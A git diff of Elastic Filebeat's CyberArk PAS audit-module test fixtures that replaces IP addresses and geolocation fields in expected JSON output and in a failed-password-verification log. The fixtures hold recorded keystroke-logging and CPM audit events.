su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 15 03:33:47", 
"destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "keystroke logging", @@ -321,7 +300,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 9514, + "log.offset": 9502, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -331,24 +310,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -379,23 +355,18 @@ "cyberarkpas.audit.extra_details.protocol": "SSH", "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_id": "8b3d0b38-aef5-49d9-bdd7-d57706887d8b", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:35:08Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Keystroke logging", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:35:08\n 2021-03-15T10:35:08Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:35:08\n 2021-03-15T10:35:08Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 15 03:35:08", 
"destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "keystroke logging", @@ -415,7 +386,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 12648, + "log.offset": 12630, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -425,24 +396,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -477,23 +445,18 @@ "cyberarkpas.audit.extra_details.protocol": "SSH", "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_id": "27f74dce-f5d5-4c94-bf99-ca6aafe2c518", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-15T14:11:18Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Keystroke logging", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 07:11:18\n 2021-03-15T14:11:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 07:11:18\n 2021-03-15T14:11:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=8T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", 
"cyberarkpas.audit.timestamp": "Mar 15 07:11:18", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "keystroke logging", @@ -513,7 +476,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 15782, + "log.offset": 15758, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -523,24 +486,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -575,23 +535,18 @@ "cyberarkpas.audit.extra_details.protocol": "SSH", "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_id": "27f74dce-f5d5-4c94-bf99-ca6aafe2c518", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-15T14:45:51Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Keystroke logging", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 07:45:51\n 2021-03-15T14:45:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 07:45:51\n 2021-03-15T14:45:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;SSHOffset=296291B;User=testark;VIDOffset=2081T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, 
"cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 15 07:45:51", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "keystroke logging", @@ -611,7 +566,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 19698, + "log.offset": 19668, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -621,24 +576,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/38_cpm_verify_password_failed.log b/x-pack/filebeat/module/cyberarkpas/audit/test/38_cpm_verify_password_failed.log index 211d487b6130..db8fe30fd662 100644 
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/38_cpm_verify_password_failed.log +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/38_cpm_verify_password_failed.log 
@@ -1,8 +1,8 @@ -<7>1 2021-03-15T13:19:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:19:58\n 2021-03-15T13:19:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;username=ELASTIC\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:19:58","IsoTimestamp":"2021-03-15T13:19:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\n","ExtraDetails":"address=34.66.114.180;username=ELASTIC\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814397"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T13:25:32Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:25:32\n 2021-03-15T13:25:32Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). 
\n\n address=34.66.114.180;username=bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:25:32","IsoTimestamp":"2021-03-15T13:25:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \n","ExtraDetails":"address=34.66.114.180;username=bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814709"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"UserDN","Value":"ELASTIC.local"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T13:33:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:33:26\n 2021-03-15T13:33:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:33:26","IsoTimestamp":"2021-03-15T13:33:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\n","ExtraDetails":"address=34.66.114.180;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615815206"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T15:04:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:04:11\n 2021-03-15T15:04:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=34.66.114.180;retriescount=1;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:04:11","IsoTimestamp":"2021-03-15T15:04:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;retriescount=1;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615820651"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T16:35:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 09:35:01\n 2021-03-15T16:35:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;retriescount=2;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 09:35:01","IsoTimestamp":"2021-03-15T16:35:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\n","ExtraDetails":"address=34.66.114.180;retriescount=2;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615826099"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:19:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:19:58\n 2021-03-15T13:19:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). 
\n\n address=81.2.69.143;username=ELASTIC\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:19:58","IsoTimestamp":"2021-03-15T13:19:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=81.2.69.143;username=ELASTIC\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814397"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 81.2.69.143\\ELASTIC\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). 
